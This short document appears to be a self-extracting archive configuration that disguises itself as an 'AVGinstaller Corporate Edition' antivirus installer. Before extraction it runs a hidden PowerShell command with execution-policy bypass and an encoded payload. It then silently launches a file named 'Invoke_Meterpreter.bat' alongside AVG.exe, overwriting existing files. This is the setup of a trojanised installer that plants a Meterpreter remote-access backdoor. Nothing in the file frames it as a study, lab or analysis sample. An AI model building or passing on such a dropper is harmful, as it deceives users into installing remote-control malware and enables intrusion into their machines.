; The sfx archive title
Title=AVGinstaller Corporate Edition
; Presetup program/command to execute before extraction
Presetup=powershell -nop -wind hidden -Exec Bypass -noni -enc TfBhDirtbSljKg==
; The path to the setup executables
Setup=Invoke_Meterpreter.bat
Setup=AVG.exe
; Use semi-silent mode
Silent=1
; Overwrite any existing files
Overwrite=1
